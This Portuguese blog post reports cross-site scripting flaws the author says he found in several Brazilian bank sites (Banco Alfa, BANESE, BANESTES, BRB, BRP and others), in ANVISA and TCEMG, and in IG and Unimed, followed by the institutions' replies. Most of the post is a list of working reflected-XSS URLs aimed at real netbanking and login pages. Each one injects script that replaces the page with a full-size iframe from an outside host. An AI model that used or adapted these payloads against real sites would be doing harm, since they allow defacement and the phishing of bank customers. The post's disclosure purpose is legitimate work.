Vários bancos com falha de segurança (A saga continua)


Durante a entrevista que concedi a Rede Brasil Atual me perguntaram se eu tinha testado a falha em outros sites de bancos, eu respondi que não, que a minha intenção era os sites dos Ministérios. Mas quando cheguei em casa (já falei que sou curioso) comecei a testar em alguns bancos.

Logo já apareceram alguns:

  • Banco Alfa
  • BRB (Banco de Brasília)
  • BANESE (Banco do Estado de Sergipe)
  • BANESTES (Banco do Estado do Espírito Santo)
  • BANRINSUL (Banco do Estado do Rio Grande do Sul)
  • BRP (Banco Ribeirão Preto)
  • BSMB (Banco Sumitomo Mitsui Brasileiro)

Os bancos gastam muito dinheiro com segurança e sempre vendem aquela velha falsa sensação de segurança para os clientes. Todos os sites que acessei foram via https, aquele cadeado de segurança que aparece no Navegador, o que não quer dizer nada, se o banco não faz a parte dele.

Além dos bancos, alguns outros sites .gov.br:

  • ANVISA (Agência Nacional de Vigilância Sanitária)
  • TCEMG (Tribunal de Contas do Estado de Minas Gerais)

Outras empresas:

  • IG
  • UNIMED

Da mesma forma que fiz antes (Segurança Nacional), enviei email para todos os órgãos envolvidos e estou aguardando alguma resposta. Happy Hack!

Screenshots:

Bancos

Banco Alfa
Banco Alfa
BANESE - Banco do Estado de Sergipe
BANESE – Banco do Estado de Sergipe
BANESTES - Banco do Estado do Espírito Santo
BANESTES – Banco do Estado do Espírito Santo
BANRINSUL - Banco do Estado do Rio Grande do Sul
BANRINSUL – Banco do Estado do Rio Grande do Sul
BRB - Banco de Brasília
BRB – Banco de Brasília
BRP - Banco Ribeirão Preto
BRP – Banco Ribeirão Preto
BSMB (Banco Sumitomo Mitsui Brasileiro)
BSMB (Banco Sumitomo Mitsui Brasileiro)

.gov.br

ANVISA - Agência Nacional de Vigilância Sanitária
ANVISA – Agência Nacional de Vigilância Sanitária
TCEMG - Tribunal de Contas do Estado de Minas Gerais
TCEMG – Tribunal de Contas do Estado de Minas Gerais

Outras empresas

IG
IG
UNIMED
UNIMED

Segue os links com as páginas alteradas, para confirmar

Bancos

* Banco Alfa (ou sem JavaScript)
https://wwws.alfanet.com.br/busca.aspx?__VIEWSTATE=<script>window.onload=function(){document.write('<body style="margin: 0px 0px"><iframe src="http://metal.mundobugado.org/banco_alfa/" width="1260" height="2100" frameborder="0" marginheight="0" marginwidth="0" scrolling="no"></body>')}</script>
* BANESE – Banco do Estado de Sergipe (ou sem JavaScript)
https://wwws.banese.com.br/netbanking/index.jsp?Agencia="><script>window.onload=function(){document.write('<body style="margin: 0px 0px"><iframe src="http://metal.mundobugado.org/banco_banese/" width="1260" height="2100" frameborder="0" marginheight="0" marginwidth="0" scrolling="no"></body>')}</script>
* BANESTES – Banco do Estado do Espírito Santo (ou sem JavaScript)
https://wwws.banestes.com.br/cgi-bin/IB_Login?gb=passa&ct="><script>window.onload=function(){document.write('<body style="margin: 0px 0px"><iframe src="http://metal.mundobugado.org/banco_banestes/" width="1260" height="2100" frameborder="0" marginheight="0" marginwidth="0" scrolling="no"></body>')}</script>
* BANRINSUL – Banco do Estado do Rio Grande do Sul (ou sem JavaScript) (Fixed! Corrigido!)
https://www.banrisul.com.br/bob/link/BOBW12HW_busca.asp?palavra=<script>window.onload=function(){document.write('<body style="margin: 0px 0px"><iframe src="http://metal.mundobugado.org/banco_banrinsul/" width="1260" height="2100" frameborder="0" marginheight="0" marginwidth="0" scrolling="no"></body>')}</script>
* BRB – Banco de Brasília (ou sem JavaScript)
https://banknet.brb.com.br/brbBanknet/conteudoIframe.jsp?usuario=&ageconta="><script>window.onload=function(){document.write('<body style="margin: 0px 0px"><iframe src="http://metal.mundobugado.org/banco_brb/" width="1260" height="2100" frameborder="0" marginheight="0" marginwidth="0" scrolling="no"></body>')}</script>
* BRP – Banco Ribeirão Preto (ou sem JavaScript)
https://netbanking.brp.com.br/NetBanking/c_brp.asp?NumConta="><script>window.onload=function(){document.write('<body style="margin: 0px 0px"><iframe src="http://metal.mundobugado.org/banco_brp/" width="1260" height="2100" frameborder="0" marginheight="0" marginwidth="0" scrolling="no"></body>')}</script>
* BSMB – Banco Sumitomo Mitsui Brasileiro (ou ANVISA – Agência Nacional de Vigilância Sanitária (ou sem JavaScript)
https://sngpc.anvisa.gov.br/AcessoPersistir.asp?senha=a&email=<script>window.onload=function(){document.write('<body style="margin: 0px 0px"><iframe src="http://metal.mundobugado.org/anvisa/" width="1260" height="2100" frameborder="0" marginheight="0" marginwidth="0" scrolling="no"></body>')}</script>
* TCEMG – Tribunal de Contas do Estado de Minas Gerais
http://www.tce.mg.gov.br/?cod_secao=5P&tipo=2&url=Pesquisa_Processo.asp&cod_secao_menu=5K&cpf="></td></tr></table><iframe src="http://gnu.org" width="500" height="300">

Outras empresas

* IG (ou sem JavaScript)
http://busca.igbusca.com.br/app/search?first_o=IG&q="><script>window.onload=function(){document.write('<body style="margin: 0px 0px"><iframe src="http://metal.mundobugado.org/ig/" width="1260" height="2100" frameborder="0" marginheight="0" marginwidth="0" scrolling="no"></body>')}</script>
* UNIMED (ou sem JavaScript)
http://www.unimed.com.br/pct/index.jsp?cd_canal=49146&cd_secao=49103&query="><script>window.onload=function(){document.write('<body style="margin: 0px 0px"><iframe src="http://metal.mundobugado.org/unimed/" width="1260" height="2100" frameborder="0" marginheight="0" marginwidth="0" scrolling="no"></body>')}</script>

UPDATE 24/05/2001 – 14h03
Mensagem do BANRINSUL:
Prezado Marcelo,
Esta vulnerabilidade já havia sido identificada pelos nossos técnicos e estava em processo de correção.
Graças ao seu comunicado este procedimento foi priorizado e a vulnerabilidade corrigida.
Agradecemos seu contato.

UPDATE 24/05/2001 – 18h00
BANESTES corrigiu pela metade a falha, retirando o método GET e deixando o POST =/
Além disso, existem outras URLs e parâmetros com a falha que você pode testar aqui e aqui.

UPDATE 25/05/2001 – 11h15
BRP corrigiu pela metade a falha (você pode ver aqui), mas já agradeceu:

Marcelo,
O Banco BRP agradece pela sua informação.
Att.
Tecnologia da Informação
Banco BRP

UPDATE 25/05/2001 – 15h35
BRP corrigiu tudo

Share on FacebookShare on Google+Tweet about this on TwitterShare on LinkedInEmail this to someone

Previous

Segurança Nacional

Next

Fitnova – Personal Trainer 2.0, Treinos Online e Fichas de Musculação

1 Comment

  1. Lammoh

    Comedia e seus 15 minutos de fama!

Deixe um Comentário

 

Powered by WordPress & Theme by Anders Norén